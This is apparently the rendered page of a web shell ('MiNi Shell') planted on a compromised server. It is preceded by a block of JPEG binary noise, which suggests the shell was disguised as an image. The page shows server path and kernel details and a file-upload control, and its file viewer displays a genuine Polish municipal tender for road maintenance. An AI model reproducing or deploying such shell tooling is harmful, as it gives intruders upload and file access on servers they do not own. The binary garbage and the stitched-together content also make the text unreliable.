JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220221/0006382801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Bieżące utrzymanie dróg gruntowych i chodników w 2022 roku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ŚWIERKLANIEC</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276258983</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Młyńska 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świerklaniec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-622</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kancelaria@ugswierklaniec.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://samorzad.gov.pl/web/gmina-swierklaniec</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Bieżące utrzymanie dróg gruntowych i chodników w 2022 roku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d88b4cb0-9305-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00063828</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000808/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Remonty dróg gruntowych i chodników w 2022 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ugswierklaniec.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">komunikacja między Zamawiającym<br/>a Wykonawcami może się odbywać wyłącznie przy użyciu środków komunikacji elektronicznej w<br/>rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną, to znaczy:<br/>• pocztą elektroniczną na adres e-mail: barbara.drozdziel@ugswierklaniec.pl oraz<br/>kancelaria@ugswierklaniec.pl lub<br/>• poprzez platformę przetargową pod adresem:<br/>https://ugswierklaniec.logintrade.net/rejestracja/ustawowe.html<br/>2. Ofertę należy złożyć wyłącznie poprzez platformę przetargową.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę<br/>należy złożyć wyłącznie poprzez platformę przetargową.<br/>Ofertę składa się pod rygorem nieważności, zgodnie z wyborem Wykonawcy:<br/>w formie elektronicznej, co oznacza postać elektroniczną opatrzoną kwalifikowanym podpisem<br/>elektronicznym lub<br/>w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>Zamawiający lub Wykonawca przekazując oświadczenia, wnioski, zawiadomienia oraz informacje przy<br/>użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu<br/>usług drogą elektroniczną, mogą zażądać od drugiej strony niezwłocznego potwierdzenia ich<br/>otrzymania.<br/>Niezwłocznie po otwarciu złożonych ofert, Zamawiający zamieści na platformie przetargowej<br/>informacje o:<br/>nazwach albo imionach i nazwiskach oraz siedzibach lub miejscach prowadzonej działalności<br/>gospodarczej albo miejscach zamieszkania Wykonawców, których oferty zostały otwarte;<br/>cenach zawartych w ofertach.<br/>Informację o wyborze oferty najkorzystniejszej lub o unieważnieniu postępowania Zamawiający<br/>zamieści na platformie przetargowej.<br/>Przyjmuje się, że dokument wysłany przy użyciu Platformy przetargowej został doręczony Wykonawcy<br/>w sposób umożliwiający zapoznanie się z jego treścią, w dniu jego przekazania na Platformę przetargową.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje dotyczące ochrony danych osobowych zawarte są w rozdziale 34 specyfikacji warunków zamówienia.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje dotyczące ochrony danych osobowych zawarte są w rozdziale 34 specyfikacji warunków zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZ.271.2.5.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 1 - Remont nawierzchni z prefabrykatów betonowych, kamiennych<br/>a) remont cząstkowy nawierzchni (chodnika / jezdni) z kostki – kostka odzyskana	1m2x120<br/>b) remont cząstkowy nawierzchni (chodnika / jezdni) z kostki betonowej – kostka nowa	1m2x50<br/>c) remont nawierzchni z bloczków betonowych prostokątnych/trylinki – materiał odzyskany	1m2x20<br/>d) przestawienie krawężnika 15x30 cm	1mbx20<br/>e) wymiana / uzupełnienie krawężnika 15x30 cm	1mbx20<br/>f) przestawienie krawężnika 20x30 cm,	1mbx10<br/>g) wymiana / uzupełnienie krawężnika 20x30 cm	1mbx10<br/>h) przestawienie obrzeża	1mbx15<br/>i) wymiana/uzupełnienie obrzeża	1mbx10<br/>Zadanie 2 - Równanie dróg gminnych gruntowych i tłuczniowych<br/>a) równanie nawierzchni dróg z wypełnieniem ubytków	100m2x300<br/>b) miejscowego uzupełnienia wybojów kruszywem	1Mgx20<br/>c) korytowanie na całej szerokości jezdni do głębokości 20 cm	1m3x100<br/>d) wykonanie nawierzchni tłuczniowej	100m2x100<br/>e) wbudowanie kruszywa łamanego frakcji 31,5-63 mm	1Mgx1000<br/>f) wbudowanie kruszywa łamanego frakcji 4-31,5 mm	1Mgx1400<br/>g) wbudowanie kruszywa łamanego frakcji 2-8 mm	1Mgx100<br/>Zadanie 3 - Roboty drogowe związane z regulacją urządzeń w związku z realizacją ww. zadań<br/>a) wpustu ulicznego	1 szt.x2<br/>b) studni kanalizacyjnej	1 szt.x3<br/>c) studni teletechnicznej	1 szt.x1<br/>d) skrzynki ulicznej	1 szt. x2<br/>Zadanie 4 - Inne roboty drogowe nie objęte powyższym wykazem (np. remont elementów kanalizacji deszczowej) przy uwzględnieniu średnich cen robocizny, materiałów, sprzętu wg Sekocenbud za kwartał poprzedzający kwartał, w którym roboty zostały wykonane.<br/>Podane ilości są szacunkowe.<br/>Szczegółowy opis przedmiotu zamówienia zawarty jest w specyfikacji warunków zamówienia i jej załącznikach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Na podstawie art. 305 pkt 1 ustawy Zamawiający przewiduje udzielenie zamówienia polegającego na powtórzeniu podobnych robót, o którym mowa w art. 214 ust.1 pkt 7 ustawy.<br/> 1. Zamówienie polegać będzie na powtórzeniu robót objętych zamówieniem podstawowym. Wielkość zamówienia udzielonego z wolnej ręki nie przekroczy 50% wartości zamówienia podstawowego.<br/> 2. Realizacja zamówienia udzielonego w trybie z wolnej ręki będzie rozliczana na tych samych zasadach, co realizacja zamówienia podstawowego. Wycena zamówienia oparta będzie o wskaźniki cenotwórcze zadania podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości i rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa: Wykonawca ubiegający się o przedmiotowe zamówienie<br/>musi wykazać spełnianie następujących warunków:<br/>1. Wykonawca musi wykazać, iż w okresie ostatnich 5 lat przed upływem terminu składania<br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej<br/>jedną robotę budowlaną polegającą na remoncie lub remontach cząstkowych dróg gruntowych -<br/>o wartości min. 300.000 zł brutto. Zamawiający nie dopuszcza możliwości sumowania<br/>doświadczenia, tj. wykazania większej ilości zrealizowanych umów o wartości łącznej 300.000<br/>złotych. Zastrzeżenie to dotyczy również sytuacji składania oferty przez Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia oraz sytuacji, gdy Wykonawca będzie polegał na<br/>zasobach innego podmiotu, na zasadach określonych w art. 118 ustawy. Warunek, o którym<br/>wyżej mowa, musi zostać spełniony w całości przez Wykonawcę (lub jednego z Wykonawców<br/>wspólnie składających ofertę) albo przez w całości przez podmiot, na którego zdolności w tym<br/>zakresie powołuje się Wykonawca. Jeżeli Wykonawca powołuje się na doświadczenie w<br/>realizacji robót wykonanych lub wykonywanych wspólnie z innymi wykonawcami, należy<br/>wykazać robotę, w której Wykonawca bezpośrednio uczestniczył lub uczestniczy.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie,<br/>z którego wynika, które roboty budowlane, wykonają poszczególni wykonawcy.<br/>W przypadku wskazania przez Wykonawcę, w celu wykazania spełniania warunków udziału,<br/>waluty innej niż złoty polski, Zamawiający zastosuje do przeliczenia średni kurs NBP na dzień<br/>zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych na portalu<br/>internetowym Urzędu Zamówień Publicznych.<br/>2. Wykonawca musi wykazać, że dysponuje lub będzie dysponował następującymi urządzeniami<br/>niezbędnymi do realizacji zamówienia:<br/>▪ równiarka samojezdna lub inny sprzęt do równania nawierzchni – minimum 1 sztuka,<br/>▪ koparka o pojemności łyżki minimum 0,25 m3 – minimum 1 sztuka,<br/>▪ walec samojezdny minimum 8-tonowy z możliwością wibracji – minimum 1 sztuka,<br/>▪ zagęszczarka o wadze minimum 300 kg – minimum 1 sztuka,<br/>▪ samochód samowyładowczy o ładowności do 5 ton – minimum 1 sztuka,<br/>▪ samochód samowyładowczy o ładowności powyżej 5 ton – minimum 1 sztuka. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty,<br/>b) wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu<br/>wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana postanowień umowy może nastąpić gdy:<br/>1) wystąpią okoliczności, o których mowa w art. 455 ust. 1 i 2 Prawa zamówień publicznych,<br/>2) jeżeli zmiana umowy będzie korzystna dla Zamawiającego i dotyczyć będzie możliwości<br/>powierzenia wykonania części robót podwykonawcy, których zakres nie został wskazany w<br/>ofercie przez Wykonawcę jako przeznaczony do wykonania przez podwykonawców;<br/>3) zmiana terminu realizacji – w przypadkach wskazanych w § 2 projektu umowy, a także w<br/>przypadku:<br/>a) zaistnienia uwarunkowań organizacyjno-technicznych, w szczególności mających miejsce<br/>w modernizowanych i remontowanych drogach oraz chodnikach, gdzie realizacja robót<br/>uwarunkowana jest przekazaniem frontu prac przez użytkownika, bądź realizacji prac przez<br/>więcej niż jednego wykonawcę na wspólnym placu budowy, a także w przypadkach przerwania<br/>robót objętych przedmiotem zamówienia na czas realizacji robót dodatkowych nieobjętych<br/>zamówieniem podstawowym, niemożliwych do przewidzenia;<br/>b) wystąpienia innych przyczyn leżących po stronie Zamawiającego, w szczególności<br/>nieterminowego przekazania terenu robót przez Zamawiającego, wstrzymania robót przez<br/>Zamawiającego, konieczności przygotowania dokumentacji technicznej lub projektowej,<br/>z zastrzeżeniem, że w przypadku wystąpienia którejkolwiek z okoliczności wymienionych<br/>powyżej termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny<br/>do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres<br/>trwania tych okoliczności i przy zachowaniu procedury opisanej w § 2 projektu umowy.<br/>4) jeżeli zmiana umowy dotyczyć będzie zmiany wysokości wynagrodzenia dla Wykonawcy,<br/>a spowodowana będzie zmianą terminu wykonania robót przez Wykonawcę, jeżeli zmiana<br/>terminu wykonania prac spowoduje bezpośrednio wzrost lub obniżenie kosztów wykonania<br/>zamówienia po stronie Wykonawcy, jeżeli zmiany te będą miały wpływ na koszty wykonania<br/>zamówienia przez Wykonawcę.<br/>5) jeżeli zmiana umowy spowodowana będzie siłą wyższą uniemożliwiającą wykonanie<br/>przedmiotu zamówienia zgodnie z SWZ. Przez siłę wyższą rozumie się zdarzenie bądź<br/>połączenie zdarzeń lub okoliczności, niezależnych od Stron, które zasadniczo utrudniają lub<br/>uniemożliwiają wykonywanie zobowiązań danej Strony wynikających z Umowy, a których dana<br/>Strona nie mogła przewidzieć ani im zapobiec lub przezwyciężyć poprzez działanie z<br/>dochowaniem należytej staranności. W przypadku zaistnienia siły wyższej Strona, której dotyczy<br/>działanie siły wyższej, zobowiązana jest poinformować drugą Stronę na piśmie o wystąpieniu<br/>siły wyższej, ze wskazaniem przewidywanego czasu trwania przeszkody w realizacji<br/>wynikających z Umowy obowiązków z powodu działania siły wyższej.<br/>3. W przypadkach przewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą<br/>stron umowy.<br/>4. Zmiany mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.<br/>5. Jeżeli zmiana umowy wymaga przygotowania dokumentacji technicznej lub projektowej,<br/>strona inicjująca zmianę przedstawi:<br/>1) projekt dokumentacji technicznej lub projektowej,<br/>2) przedmiar i niezbędne rysunki.<br/>6. Do każdej propozycji zmiany, inicjujący zmianę przedstawi:<br/>1) opis propozycji zmiany, w tym wpływ na terminy wykonania,<br/>2) uzasadnienie zmiany,<br/>3) obliczenia uzasadniające ewentualną zmianę wynagrodzenia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ugswierklaniec.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-08 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> W przypadku podjęcia przez Zamawiającego decyzji o prowadzeniu negocjacji, Zamawiający zaprasza jednocześnie trzech Wykonawców, którzy złożyli oferty niepodlegające odrzuceniu i których oferty zostały najwyżej ocenione na podstawie kryteriów oceny ofert, to jest ceny oraz okresu gwarancji i rękojmi, do negocjacji ofert złożonych w odpowiedzi na ogłoszenie o zamówieniu.

Creat By MiNi SheLL
Email: jattceo@gmail.com